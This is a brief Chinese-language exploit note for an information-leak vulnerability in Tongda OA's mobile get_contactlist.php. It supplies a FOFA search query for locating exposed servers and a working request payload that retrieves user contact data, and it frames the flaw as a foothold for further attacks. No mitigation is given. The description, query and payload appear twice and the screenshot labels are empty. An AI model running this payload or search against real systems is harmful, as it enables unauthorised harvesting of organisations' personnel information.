T10-25通达-OA-InformationLeakage
漏洞描述:
通达OA get_contactlist.php文件存在信息泄漏漏洞,攻击者通过漏洞可以获取敏感信息,进一步攻击。
网站图片:
网络测绘:
fofa语法:
app.name=“通达 OA”
漏洞复现:
payload:
/mobile/inc/get_contactlist.php?P=1&KWORD=%25&isuser_info=3
效果图:
通达OA get_contactlist.php文件存在信息泄漏漏洞,攻击者通过漏洞可以获取敏感信息,进一步攻击。
app.name=“通达 OA”
payload:
/mobile/inc/get_contactlist.php?P=1&KWORD=%25&isuser_info=3
效果图: